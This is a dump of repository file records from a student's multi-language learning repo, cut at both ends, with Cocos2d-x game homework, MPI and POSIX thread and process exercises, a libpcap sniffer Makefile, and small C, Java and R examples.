0.1f)),\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n\n player->runAction(seq);\n \n }\n// No Use to if\n// inline float clampf(float value, float min_inclusive, float max_inclusive)\n// {\n// if (min_inclusive > max_inclusive) {\n// std::swap(min_inclusive, max_inclusive);\n// }\n// return value < min_inclusive ? min_inclusive : value < max_inclusive? value : max_inclusive;\n// }\n// if (pT->getPercentage() <= 80.0f) {\n// pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() + 20.0f));\n// }\n // 点击虚拟按键x播放帧动画并让血条减少,点击y播放帧动画并让血条增加(加分项)\n pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() + 20.0f));\n }\n });\n \n auto yButton = MenuItemLabel::create(yLabel, [&](Ref * sender) {\n if (!haveAction) {\n auto vec = Vec2(0, 0);\n Vec2 position = player->getPosition();\n if (rect.containsPoint(position + vec)) {\n auto moveBy = MoveBy::create(0.8f, vec);\n auto action = Spawn::createWithTwoActions(moveBy, Animate::create(Animation::createWithSpriteFrames(dead, 0.1f)));\n auto seq = Sequence::create(\n CallFunc::create(this, callfunc_selector(HelloWorld::actionBegin)),\n action,\n Animate::create(Animation::createWithSpriteFrames(idle, 0.1f)),\n CallFunc::create(this, callfunc_selector(HelloWorld::actionFinishedCallback)),\n NULL);\n player->runAction(seq);\n }\n// if (pT->getPercentage() >= 20.0f) {\n// pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() - 20.0f));\n// }\n // 点击虚拟按键x播放帧动画并让血条减少,点击y播放帧动画并让血条增加(加分项)\n pT->runAction(ProgressTo::create(1.0f, pT->getPercentage() - 20.0f));\n }\n });\n \n \n \n wButton->setPosition(wLabel->getContentSize().width * 1.5, wLabel->getContentSize().height * 1.5);\n aButton->setPosition(wLabel->getContentSize().width * 0.5, wLabel->getContentSize().height * 0.5);\n sButton->setPosition(wLabel->getContentSize().width * 1.5, wLabel->getContentSize().height * 0.5);\n dButton->setPosition(wLabel->getContentSize().width * 2.5, wLabel->getContentSize().height * 0.5);\n xButton->setPosition(visibleSize.width - wLabel->getContentSize().width * 1,\n wLabel->getContentSize().height * 1.5);\n yButton->setPosition(visibleSize.width - wLabel->getContentSize().width * 1.5,\n wLabel->getContentSize().height * 0.5);\n \n auto buttonMenu = Menu::create(wButton, aButton, sButton, dButton, xButton, yButton,NULL);\n\n \n buttonMenu->setPosition(0, 0);\n this->addChild(buttonMenu, 4);\n \n return true;\n}\n\nvoid HelloWorld::updateTime(float dt){\n char buffer[4] = {0};\n sprintf(buffer, \"%d\", dtime);\n time->setString(buffer);\n dtime--;\n}\n\n// X、Y播放的动画不能同时播放\nvoid HelloWorld::actionBegin() {\n haveAction = true;\n}\n// X、Y播放的动画不能同时播放\nvoid HelloWorld::actionFinishedCallback() {\n haveAction = false;\n}\n\n// Use CallBack version\n//void HelloWorld::wButtomClickCallback(cocos2d::Label* pSender) {\n// auto player = this->getChildByName(\"player\");\n// Vec2 position = player->getPosition();\n// player->setPosition(position + Vec2(0, 100));\n// pSender->setString(\"w\");\n//}\n" }, { "alpha_fraction": 0.6701388955116272, "alphanum_fraction": 0.6736111044883728, "avg_line_length": 17.0625, "blob_id": "e341ffd7a4d2abffc22040b30b487ac6015dd597", "content_id": "c0f715009281126862320597d634c5e3b16c7331", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 440, "license_type": "permissive", "max_line_length": 46, "num_lines": 16, "path": "/c/projects/MPI/helloworld/helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <mpi.h>\n#include <stdio.h>\n\nint main (int argc, char **argv) {\n\n // 通过MPI_Init函数进入MPI环境并完成所有的初始化工作,标志并行代码的开始。\n MPI_Init(&argc, &argv);\n\n printf(\"%s\\n\", \"helloworld\");\n\n // 通过MPI_Finalize函数从MPI环境中退出,标志并行代码的结束,\n // 如果不是MPI程序最后一条可执行语句,则运行结果不可知。\n MPI_Finalize();\n\n return 0;\n}" }, { "alpha_fraction": 0.48275861144065857, "alphanum_fraction": 0.5206896662712097, "avg_line_length": 16.058822631835938, "blob_id": "0b6b7817275badc2e90be875d9161ac94130beb7", "content_id": "cb7eef4533cf4bb2465d024720bfa983bff123f6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 290, "license_type": "permissive", "max_line_length": 32, "num_lines": 17, "path": "/c/hardwork/hardway/stdarg.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <stdarg.h>\nvoid func(int, ...);\nint main() {\n func(2, 3, 5, 7, 11, 13);\n return 0;\n}\nvoid func(int n, ...) {\n int number, i = 0;\n va_list start;\n va_start(start, n);\n while (i != 3) {\n number = va_arg(start, int);\n i++;\n }\n printf(\"%d\", number);\n}\n" }, { "alpha_fraction": 0.6858108043670654, "alphanum_fraction": 0.7038288116455078, "avg_line_length": 23, "blob_id": "ac9c72c1e4106f4e08b9975f528a18c735ba6f0e", "content_id": "aa76d326a44bf25eb40d4dfe90b1cd8d59d90032", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 888, "license_type": "permissive", "max_line_length": 57, "num_lines": 37, "path": "/cplusplus/projects/Cocos2dx/hardwork/homework/week11/Classes/HelloWorldScene.h", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#ifndef __HELLOWORLD_SCENE_H__\n#define __HELLOWORLD_SCENE_H__\n\n#include \"cocos2d.h\"\nusing namespace cocos2d;\nclass HelloWorld : public cocos2d::Layer\n{\npublic:\n static cocos2d::Scene* createScene();\n\n virtual bool init();\n \n // implement the \"static create()\" method manually\n CREATE_FUNC(HelloWorld);\n\t// void update(float dt) override;\n void updateTime(float dt);\n void actionBegin();\n void actionFinishedCallback();\n// void wButtomClickCallback(cocos2d::Label* pSender);\nprivate:\n\tcocos2d::Sprite* player;\n\tcocos2d::Vector<SpriteFrame*> attack;\n\tcocos2d::Vector<SpriteFrame*> dead;\n\tcocos2d::Vector<SpriteFrame*> run;\n\tcocos2d::Vector<SpriteFrame*> idle;\n\tcocos2d::Size visibleSize;\n\tcocos2d::Vec2 origin;\n\tcocos2d::Label* time;\n\tint dtime;\n cocos2d::Rect rect;\n\tcocos2d::ProgressTimer* pT;\n \n bool haveAction;\n\n};\n\n#endif // __HELLOWORLD_SCENE_H__\n" }, { "alpha_fraction": 0.4482758641242981, "alphanum_fraction": 0.4689655303955078, "avg_line_length": 17.1875, "blob_id": "aa3af4f873a85cdf5dab09edcd129ef9d1ed4637", "content_id": "c79e7698138b6bdc2dc6f604b6c40b45a82b2928", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 290, "license_type": "permissive", "max_line_length": 49, "num_lines": 16, "path": "/c/projects/POSIX/Lab1/1.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n#include <unistd.h>\n\nint main() {\n int pid_1 = fork();\n if (pid_1 != 0) {\n int pid_2 = fork();\n if (pid_2 != 0) {\n puts(\"a\");\n } else {\n puts(\"c\"); // second sub process print \"c\"\n }\n } else {\n puts(\"b\"); // first sub process print \"b\"\n }\n}" }, { "alpha_fraction": 0.7316129207611084, "alphanum_fraction": 0.7470967769622803, "avg_line_length": 26.714284896850586, "blob_id": "51019bb479ef07568f0932e77c374206f5010115", "content_id": "9fe3d7325ff9e7bdf549139473cd5da7f9a263e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 775, "license_type": "permissive", "max_line_length": 211, "num_lines": 28, "path": "/vala/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# Timer-Vala\n`jskyzero` `2017/11/05`\n\n## Overview\n\nA basic timer program implemented in Vala\n\n![](docs/preview.png)\n\nPower By\n+ Vala: Vala is a new programming language that allows modern programming techniques to be used to write applications that run on the GNOME runtime libraries, particularly GLib and GObject.\n+ Gtk+: GTK+ is a multi-platform toolkit for creating graphical user interfaces. Offering a complete set of widgets, GTK+ is suitable for projects ranging from small one-off tools to complete application suites.\n\n## Install and Run\n\n```\n# install\nmake \n# run\n./timer\n```\n\n\n## Reference\n\n+ [Vala Tutorial](https://wiki.gnome.org/Projects/Vala/Tutorial)\n+ [Valadoc](https://valadoc.org/index.htm)\n+ [Gtk 3.0](https://lazka.github.io/pgi-docs/Gtk-3.0/index.html)" }, { "alpha_fraction": 0.7053205966949463, "alphanum_fraction": 0.7053205966949463, "avg_line_length": 32.318180084228516, "blob_id": "9b05fc4f65328b2d00f340bfc14beb4ae62c27f4", "content_id": "d87616e6d0631d4c32542b5b63e6c6b43b1aa569", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 733, "license_type": "permissive", "max_line_length": 94, "num_lines": 22, "path": "/c/projects/sniff/Makefile", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "CC= gcc\nCFLAGS= -g -Wall -DDEBUG\nINCLUDES= -I. -I/usr/include/pcap/ #make sure you got the right path of pcap.h on your machine\nLIBS= -lpcap #again, this is usually -lpcap unless you installed it under different name\n#if the linker gives an error (or a whole bunch of them) then you probably\n#don't have libpcap.so to fix the problem make the above line\n#LIBS= /usr/lib/libpcap.a instead\n\nOBJS= buffer.o capture.o\nEXEC= minisniff\n\nall: buffer.o capture.o main.c Makefile\n\t$(CC) $(CFLAGS) $(INCLUDES) main.c $(OBJS) $(LIBS) -o $(EXEC)\n\nbuffer.o: buffer.h buffer.c Makefile\n\t$(CC) $(CFLAGS) $(INCLUDES) -c buffer.c\n\ncapture.o: capture.c capture.h Makefile\n\t$(CC) $(CFLAGS) $(INCLUDES) -c capture.c\n\t\nclean:\n\trm -rf *.o *~ $(EXEC) core\n" }, { "alpha_fraction": 0.7250673770904541, "alphanum_fraction": 0.7277628183364868, "avg_line_length": 23.733333587646484, "blob_id": "8f09d657070c2f21c72d99d99ed67f3cabff0a57", "content_id": "6379eead941d385bacfda1db540247b54d605d9a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 575, "license_type": "permissive", "max_line_length": 92, "num_lines": 15, "path": "/java/hardwork/helloworld/README.md", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "\n## HelloWold\n新建一个文件`HelloWorld.java`,键入如下代码:\n```Java\npublic class HelloWorld \n{\n /* HelloWorld.java */\n public static void main(String []args)\n {\n System.out.println(\"HelloWorld\");\n }\n}\n```\nJava是一门编译型语言,这意味者我们需要先编译,然后才能运行,导航到上述代码的根目录使用命令`javac HelloWorld`编译,然后键入`java HelloWorld`运行。\n\nJDK中有很多其他指令,如`java javac jar native2ascii`等等,具体的学习可以等到用的上的时候在开始查参考。" }, { "alpha_fraction": 0.6162790656089783, "alphanum_fraction": 0.6266149878501892, "avg_line_length": 23.15625, "blob_id": "52f3baf28b320a45a6165b56ecd3acdb74c49515", "content_id": "2d399ff534df6a16c56958947a266ce9e0115843", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 834, "license_type": "permissive", "max_line_length": 69, "num_lines": 32, "path": "/c/projects/MPI/hardway/MPI_group_excluded.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 基于旧进程组创建一个新的组的时候,可能希望排除一些成员进程。\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs, even_rank;\n MPI_Group group_world, even_group;\n int i;\n int nonmembers[10];\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n MPI_Comm_group(MPI_COMM_WORLD, &group_world);\n\n for (i = 0; i < numprocs / 2; i++) {\n nonmembers[i] = 2 * i + 1;\n }\n\n // int MPI_Group_excl(MPI_Group old_group, int count, \n // int *nonmembers, MPI_Group *new_group)\n MPI_Group_excl(group_world, numprocs / 2, nonmembers, &even_group);\n\n MPI_Group_rank(even_group, &even_rank);\n\n printf(\"In process %d: even rank is %d\\n\", myid, even_rank);\n\n MPI_Finalize();\n return 0;\n}\n\n" }, { "alpha_fraction": 0.5637982487678528, "alphanum_fraction": 0.5994065403938293, "avg_line_length": 19.454545974731445, "blob_id": "5816b870a5acf597a2bcfde92cc151172a3f1190", "content_id": "5351c9682e5325814d37b481d4a46b1f84e931af", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 674, "license_type": "permissive", "max_line_length": 117, "num_lines": 33, "path": "/c/hardwork/tips/const.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h>\n\n/*\n * So today, let's talk about const in C\n *\n * You can find more reference on stackoverflow\n * https://stackoverflow.com/questions/1143262/what-is-the-difference-between-const-int-const-int-const-and-int-const\n */\n\nint main() {\n int num0 = 0;\n /* this is same to const int */\n int const num2 = 2;\n const int num1 = 1;\n\n /* this is a const pointer(int *); */\n int* const p1 = &num0;\n /* this is a const int */\n int const* p2 = &num0;\n /*\n * this is a const int\n * const int * == int const *\n * const int * const == int const * const\n *\n */\n const int* p3 = &num0;\n\n *p1 = -1;\n\n fprintf(stdout, \"num0 = %d\\n\", num0);\n\n return 0;\n}" }, { "alpha_fraction": 0.6122503280639648, "alphanum_fraction": 0.6218375563621521, "avg_line_length": 23.232257843017578, "blob_id": "30e75b11789f47633c74d15161d67740dd17316a", "content_id": "491436f5d6399ccfb5b0c81df95a768732b7bb7f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 3875, "license_type": "permissive", "max_line_length": 77, "num_lines": 155, "path": "/c/projects/POSIX/Lab3/3.2.reader_first.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/*\n * jskyzero 2017(R)\n */\n\n#include <pthread.h> // for pthread_create(), pthread_exit()\n#include <semaphore.h> // for sem_t, sem_wait(), sem_post()\n#include <stdio.h> // for fopen(), perror()\n#include <stdlib.h> // for exit(), atoi(), malloc(), free()\n#include <string.h> // for strtok()\n#include <unistd.h> // for sleep()\n\n// max 3 num, each max 10 char, so we let buffer be 40\n#define LINE_BUFFER_SIZE 40\n// this file is copy from powerpoint\n#define FILE_NAME \"3.2.testfile\"\n// for strtok()\n#define KEY_STR \" \"\n// if you need DEBUG, then uncomment it\n// #define DEBUG_TAG 1\n\n// test data store type\ntypedef struct test_data {\n int index; // 正整数,表示线程序号。\n char type; // 相应线程角色,P表示生产者,C表示消费者。\n int begin_time; // 正数,表示存放或取出操作的开始时间\n int duration; // 正数,表示操作的持续时间。\n} test_data_type;\n\nint readcount;\nsem_t wrt, mutex;\n\nvoid read_file_work();\nvoid line_buffer_to_test_data(char *, test_data_type *);\nvoid print_test_data(test_data_type *);\nvoid work_with_test_data(test_data_type *);\nvoid *reader(void *data);\nvoid *writer(void *data);\nint read_item();\nint write_item();\n\nint main() {\n sem_init(&mutex, 0, 1); \n sem_init(&wrt, 0, 1); \n // Main Part\n read_file_work();\n // creat and then destory\n sem_destroy(&mutex);\n sem_destroy(&wrt);\n // wait wait for all pthreads to complete\n pthread_exit(0);\n}\n\nint read_item() {\n printf(\"-READING-\");\n return 0;\n}\n\nint write_item() {\n printf(\"-WRITING-\");\n return 0;\n}\n\nvoid *reader(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&mutex);\n readcount++;\n if (readcount == 1) sem_wait(&wrt);\n sem_post(&mutex);\n\n printf(\" readID:%10d \", data->index);\n if (read_item()) {\n perror(\" READ ERROR\\n\");\n } else {\n printf(\" READ SUCCESS\\n\");\n }\n sleep(data->duration);\n\n sem_wait(&mutex);\n readcount--;\n if (readcount == 0) sem_post(&wrt);\n sem_post(&mutex);\n free(data);\n return (NULL);\n}\n\nvoid *writer(void *arg) {\n test_data_type *data = (test_data_type *)arg;\n sleep(data->begin_time);\n sem_wait(&wrt);\n printf(\"writeID:%10d \", data->index);\n if (write_item()) {\n perror(\"WRITE ERROR\\n\");\n } else {\n printf(\"WRITE SUCCESS\\n\");\n }\n sleep(data->duration);\n sem_post(&wrt);\n free(data);\n return (NULL);\n}\n\nvoid work_with_test_data(test_data_type *data) {\n pthread_t thread;\n if (data->type == 'R') {\n pthread_create(&thread, NULL, reader, (void *)data);\n } else {\n pthread_create(&thread, NULL, writer, (void *)data);\n }\n}\n\nvoid print_test_data(test_data_type *data) {\n printf(\"|index:%10d|type:%c|begin_time:%10d|duration:%10d|\\n\", data->index,\n data->type, data->begin_time, data->duration);\n}\n\nvoid line_buffer_to_test_data(char *line, test_data_type *data) {\n char *pch = strtok(line, KEY_STR);\n data->index = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->type = pch[0];\n pch = strtok(NULL, KEY_STR);\n data->begin_time = atoi(pch);\n pch = strtok(NULL, KEY_STR);\n data->duration = atoi(pch);\n}\n\nvoid read_file_work() {\n // malloc buffer\n char *line_buffer = (char *)malloc(sizeof(char) * LINE_BUFFER_SIZE);\n if (line_buffer == NULL) {\n perror(\"malloc faile\\n\");\n exit(-1);\n }\n // open file\n FILE *test_file = fopen(FILE_NAME, \"r\");\n if (test_file == NULL) {\n perror(\"File open failed\\n\");\n exit(-1);\n }\n // readfile and process\n while (fgets(line_buffer, LINE_BUFFER_SIZE, test_file) != NULL) {\n test_data_type *line_test_data =\n (test_data_type *)malloc(sizeof(test_data_type));\n line_buffer_to_test_data(line_buffer, line_test_data);\n#ifdef DEBUG_TAG\n print_test_data(line_test_data);\n#endif\n work_with_test_data(line_test_data);\n }\n // free malloc data\n free(line_buffer);\n // close file\n fclose(test_file);\n}" }, { "alpha_fraction": 0.6663973927497864, "alphanum_fraction": 0.6680129170417786, "avg_line_length": 27.813953399658203, "blob_id": "839b66c32d6ff421091fd93844f87f5037381661", "content_id": "4f78df40e26c3b2cb41974be0c95456352c4c369", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1698, "license_type": "permissive", "max_line_length": 60, "num_lines": 43, "path": "/c/projects/MPI/hardway/MPI_comm_dup.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 在之前的学习中,我们经常使用系统帮助我们创建的初始组内通信子MPI_COMM_WORLD作为通信子的输入。\n// 其实,还有两个系统默认创建的通信子,一个是COMM_SELF,另一个是COMM_NULL。\n// COMM_SELF仅仅包含了当前进程,而COMM_NULL则什么进程都没有包含。\n// 在通信子的创建中,需要特别注意的是MPI中有一个\"鸡生蛋, 蛋生鸡\"的特点,\n// 即所有MPI通信子的创建都是由基础通信子,即MPI_COMM_WORLD(是在MPI的外部被定义的),创建的。\n// 而这些被创建的通信子又可以作为新的通信子创建的基础。\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Comm new_comm;\n int result;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n // int MPI_Comm_dup(MPI_Comm comm,MPI_Comm *newcomm)\n MPI_Comm_dup(MPI_COMM_WORLD, &new_comm);\n\n MPI_Comm_compare(MPI_COMM_WORLD, new_comm, &result);\n\n // MPI_IDENT表示上下文(context)和组(group)都相同,\n // MPI_CONGRUENT表示上下文不同(different)但组完全相同(identical),\n // MPI_SIMILAR表示上下文不同,组的成员相同但次序不同(similar),\n // 否则就是MPI_UNEQUAL。\n if (myid == 0) {\n if (result == MPI_IDENT) {\n printf(\"The comms are identical.\\n\");\n } else if (result == MPI_CONGRUENT) {\n printf(\"The comms are congruent.\\n\");\n } else if (result == MPI_SIMILAR) {\n printf(\"The comms are similar.\\n\");\n } else if (result == MPI_UNEQUAL) {\n printf(\"The comms are unequal.\\n\");\n }\n }\n\n MPI_Finalize();\n return 0;\n}" }, { "alpha_fraction": 0.43724697828292847, "alphanum_fraction": 0.4655870497226715, "avg_line_length": 19.625, "blob_id": "a157b4265c2cc39943fa286c92ec6df0fdfc6767", "content_id": "d4fc450274b2f8195b6310745a6f37432c5cb287", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 494, "license_type": "permissive", "max_line_length": 68, "num_lines": 24, "path": "/java/projects/algorithms/chapter1/part1/Q11.java", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "/**\n * Q11\n */\n\npublic class Q11 {\n public static void main(String[] args) {\n Boolean array[][] = {{true, true, false}, {false, false, true}};\n\n System.out.printf(\"%8s\", \"R\\\\L\");\n for (int j = 0; j < 3; j++) {\n System.out.printf(\"%8d\", j);\n }\n System.out.printf(\"\\n\");\n\n for (int i = 0; i < 2; i++) {\n System.out.printf(\"%8d\", i);\n for (int j = 0; j < 3; j++) {\n System.out.printf(\"%8b\", array[i][j]);\n }\n System.out.printf(\"\\n\");\n }\n\n }\n}" }, { "alpha_fraction": 0.6549707651138306, "alphanum_fraction": 0.6608186960220337, "avg_line_length": 20.5, "blob_id": "30ab441bed1ac571bd5cdad9559410f76170f601", "content_id": "bf0ab21eb1d23b594e7f225b66e94f73feb5b490", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 171, "license_type": "permissive", "max_line_length": 63, "num_lines": 8, "path": "/c/hardwork/helloworld/helloworld.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf\n\n// this is main func\nint main() {\n // call the 'printf' function to print 'HelloWorld' in screen\n printf(\"HelloWorld\\n\");\n return 0;\n}" }, { "alpha_fraction": 0.40779221057891846, "alphanum_fraction": 0.4545454680919647, "avg_line_length": 20.38888931274414, "blob_id": "6dab57d2f533d18d2d262885cb7e09c73961531a", "content_id": "50f33fe69fe2008ade27f32b4e3d740e8c59162f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 385, "license_type": "permissive", "max_line_length": 64, "num_lines": 18, "path": "/c/hardwork/hardway/double_size.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n\nint *doubleCapacity(int *p, int n) {\n static int a[10000];\n for (int i = 0; i < n; i++) {\n *(a + i) = *(p + i);\n }\n for (int i = 0; i < n; i++) {\n *(a + n + i) = 0;\n }\n return a;\n}\n\nint main() {\n int list[5] = {1, 2, 3, 4, 5};\n int *newlist = doubleCapacity(list, 5);\n for (int i = 0; i < 2 * 5; i++) printf(\"%d \", *(newlist + i));\n}\n" }, { "alpha_fraction": 0.5802469253540039, "alphanum_fraction": 0.6234567761421204, "avg_line_length": 19.3125, "blob_id": "ab7757c5e3b9c0730d9a6fa2571cd2be0feeacff", "content_id": "63044ff5262f1b7f0af3dfc55cc143aea4546fef", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 324, "license_type": "permissive", "max_line_length": 58, "num_lines": 16, "path": "/R/harwork/packages/wordcloud2/wordcloud.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# wordcloud2\n# from https://github.com/Lchiffon/wordcloud2\n\nlibrary(wordcloud2)\n\n# so column name is not valueable ?\nwords_frame <- data.frame(\n v2 = c(1:5),\n v3 = c(5:1)\n)\n\n# print(class(demoFreqC))\n\nwordcloud2(words_frame, size = 2, \n minRotation = - pi / 6, maxRotation = - pi / 6,\n rotateRatio = 1)" }, { "alpha_fraction": 0.6140350699424744, "alphanum_fraction": 0.6456140279769897, "avg_line_length": 25, "blob_id": "0657935160ea804ab85f5ed0198c2f4601e8412c", "content_id": "3d112099bd113d33cefdaf327b05de02e61e2808", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 285, "license_type": "permissive", "max_line_length": 65, "num_lines": 11, "path": "/R/harwork/packages/fun/mime_sweeper.R", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "# install.packages(\"fun\")\n# from https://www.rdocumentation.org/packages/fun/versions/0.1-0\nlibrary(\"fun\")\n\n## should use Xlib for the x11() device under *nix, e.g\n## Not run: \n# if (.Platform$OS.type == \"windows\") \n# x11() else x11(type = \"Xlib\")\n# ## End(Not run)\n\nmine_sweeper()" }, { "alpha_fraction": 0.3888888955116272, "alphanum_fraction": 0.46296295523643494, "avg_line_length": 54, "blob_id": "d622843ac4e39b56467803b7719e2f25a5f8e3f9", "content_id": "ccf2252aff3b197b559dc394f3c9d9e1dd301ae2", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 54, "license_type": "permissive", "max_line_length": 54, "num_lines": 1, "path": "/bash/example/rename_file.sh", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "ls | cut -d '.' -f 1 | xargs -I {1} mv {1}.png {1}.jpg" }, { "alpha_fraction": 0.571212112903595, "alphanum_fraction": 0.5878787636756897, "avg_line_length": 18.441177368164062, "blob_id": "f0df693bdbc7fb43f0c974b501bf05b1f4739f81", "content_id": "eb147b3af584c39b978c4c9455cd4175983c93c8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 660, "license_type": "permissive", "max_line_length": 41, "num_lines": 34, "path": "/c/hardwork/hardway/to_binary.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <stdlib.h> // for rand()\n#include <time.h> // for time()\n\n#define TEST_SIZE 10\n\ntypedef int num_type;\n\nvoid dec_to_bin(num_type n);\nvoid print_binary(num_type n);\n\nint main() {\n // void srand (unsigned int seed)\n srand(time(NULL));\n\n for (int i = 0; i < TEST_SIZE; i++) {\n // int rand (void)\n // num_type == rand return value type\n dec_to_bin(rand());\n }\n}\n\n// print the dec and bin value of the num\nvoid dec_to_bin(num_type n ) {\n printf(\"%22d(10) is \", n); \n print_binary(n);\n printf(\"(2)\\n\");\n}\n\nvoid print_binary(num_type n) {\n if (n <= 0) return;\n print_binary(n / 2);\n printf(\"%d\", n % 2);\n}" }, { "alpha_fraction": 0.5861027240753174, "alphanum_fraction": 0.5957704186439514, "avg_line_length": 24.859375, "blob_id": "4a72150f73fa8f10912e124c2062b9a4fc5d91ae", "content_id": "4ba4358a7f47ca14212d3eb3387eb9fb989f3595", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1655, "license_type": "permissive", "max_line_length": 83, "num_lines": 64, "path": "/c/projects/POSIX/Lab1/3.1.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "#include <stdio.h> // for printf()\n#include <unistd.h> // for fork()\n#include <sys/shm.h> // for shmget() shmat()\n#include <sys/stat.h> // for S_IRUSR, S_IWUSR\n#include <stdlib.h> // for exit()\n#include <assert.h> // for assert()\n\n#define MAX_SEQUENCE 10\n\n// share memory structure\ntypedef struct {\n long fib_sequence[MAX_SEQUENCE];\n int sequence_size;\n} share_data;\n\nint main(int argv, char *args[])\n{\n // run with only one num \n assert(argv == 2);\n // get size \n int size = atoi(args[1]);\n // check size\n if (size >= MAX_SEQUENCE) {\n puts(\"args size too big\\n\");\n exit(1);\n }\n // begin to store info about shm\n int pid;\n int segment_id;\n share_data *share;\n // ask shm and connecte\n segment_id = shmget(IPC_PRIVATE, sizeof(share_data), S_IRUSR | S_IWUSR);\n share = (share_data *) shmat(segment_id, NULL, 0);\n // initial size\n share->sequence_size = size;\n // fork()\n if ((pid = fork())) {\n // wait sub process finished\n wait(NULL);\n // father process print and \n for (int i = 0 ; i < share->sequence_size; i++) {\n printf(\"%ld \", share->fib_sequence[i]);\n }\n puts(\"\\n\");\n // close connection\n shmdt(share);\n // free shm\n shmctl(segment_id, IPC_RMID, NULL);\n } else {\n // sub process\n // intial fib[0] and fib[1]\n share->fib_sequence[0] = 0;\n share->fib_sequence[1] = 1;\n // calculate later fib[i] \n for (int i = 2 ; i < share->sequence_size; i++) {\n share->fib_sequence[i] = share->fib_sequence[i-1] + share->fib_sequence[i-2];\n }\n // close connection\n shmdt(share);\n\n // why no connection ? \n // sub process have a connection from father process\n }\n}\n" }, { "alpha_fraction": 0.6564659476280212, "alphanum_fraction": 0.6604146361351013, "avg_line_length": 24.350000381469727, "blob_id": "ecb602612b4c3cb309c7fc74bf114e4a9199b1c0", "content_id": "46cba297daa93802d7f44efed56fe16d50067813", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1143, "license_type": "permissive", "max_line_length": 79, "num_lines": 40, "path": "/c/projects/MPI/hardway/MPI_comm_split.c", "repo_name": "jskyzero/Languages", "src_encoding": "UTF-8", "text": "// 有时候我们希望根据拓扑来创建不同的域,例如创建一个二维数组,显然一个个创建是很不方便的,\n// 这时候我们需要用到一个新的函数来进行划分。\n\n#include <mpi.h>\n#include <stdio.h>\n\nint main(int argc, char **argv) {\n int myid, numprocs;\n MPI_Comm row_comm, column_comm;\n int myrow, mycolumn;\n int color = 3;\n\n MPI_Init(&argc, &argv);\n\n MPI_Comm_rank(MPI_COMM_WORLD, &myid);\n MPI_Comm_size(MPI_COMM_WORLD, &numprocs);\n\n myrow = myid / color;\n mycolumn = myid % color;\n\n // int MPI_Comm_split(MPI_Comm comm, int color, int key, MPI_Comm *newcomm)\n MPI_Comm_split(MPI_COMM_WORLD, mycolumn, myrow, &row_comm);\n MPI_Comm_split(MPI_COMM_WORLD, myrow, mycolumn, &column_comm);\n\n int rowsum, columnsum;\n\n rowsum = myid;\n columnsum = myid;\n\n 